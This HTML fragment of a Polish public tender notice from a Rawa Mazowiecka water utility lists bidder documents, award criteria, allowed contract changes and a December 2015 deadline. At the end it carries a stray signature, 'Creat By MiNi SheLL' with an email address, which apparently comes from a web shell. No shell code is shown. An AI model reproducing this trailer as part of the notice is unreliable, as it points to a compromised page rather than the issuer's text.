<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia Umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania (T) - okres wykonania w dniach - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
1)	zmiany terminu realizacji umowy spowodowanej działaniami instytucji/urzędów/podmiotów gospodarczych/organów administracji związanymi z realizacją zamówienia i mających wpływ na jego wykonanie zgodnie z wymaganiami niniejszej specyfikacji istotnych warunków zamówienia, w szczególności w brak możliwości uzyskania decyzji formalno-prawnych/uzgodnień/dokumentacji z winy nie leżącej po stronie Wykonawcy. W takim przypadku Zamawiający może wyrazić zgodę na wydłużenie terminu wykonania umowy, jednak nie dłużej niż o ilość dni przeszkody w realizacji zamówienia.
2)	zmiany sposobu realizacji umowy spowodowanej w szczególności zastosowaniem przez Wykonawcę rozwiązań korzystniejszych dla Zamawiającego w odniesieniu do rozwiązań przewidzianych w Specyfikacji Istotnych Warunków Zamówienia. 
3)	zmiany sposobu realizacji umowy, w tym wzajemnych rozliczeń, wynikającej ze zmiany przepisów prawa  mających wpływ na wykonanie zamówienia zgodnie z wymaganiami niniejszej specyfikacji istotnych warunków zamówienia (w tym zmiana stawki VAT - w takim wypadku wynagrodzenie Wykonawcy może ulec zmianie o różnicę pomiędzy obowiązującą a wprowadzaną stawką podatku).
4)	nazwy Wykonawcy z powodu przekształcenia lub innych zdarzeń skutkujących zmianą nazwy, wskazania osób występujących po stronie Zamawiającego lub Wykonawcy - w razie wystąpienia okoliczności uzasadniających powyższe zmiany.
5)	zmiany podmiotu na rzecz którego Zamawiający dokonuje zapłaty wynagrodzenia w przypadku udzielenia zgody przez Zamawiającego na zawarcie umowy z Podwykonawcą
 i jej zawarcia przez Wykonawcę.  
 
2.	W sytuacji wystąpienia okoliczności wskazanych w ust. 1 pkt. 1) i 2)  Wykonawca występuje z pisemnym wnioskiem do Zamawiającego przedstawiając uzasadnienie dla zmiany. Zamawiający może (ale nie jest zobowiązany) wyrazić zgodę na zmiany, w uznaniu argumentów przedstawionych we wskazanym wniosku przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rawskie Wodociągi i Kanalizacja Sp. z o.o., ul. Juliusza Słowackiego 70, 96-200 Rawa Mazowiecka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2015 godzina 10:00, miejsce: Sekretariat w siedzibie spółki Rawskie Wodociągi i Kanalizacja Sp. z o.o, ul. J. Słowackiego 70, 96-200 Rawa Mazowiecka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia będzie realizowany w ramach zadania przewidzianego do współfinansowania ze środków unijnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com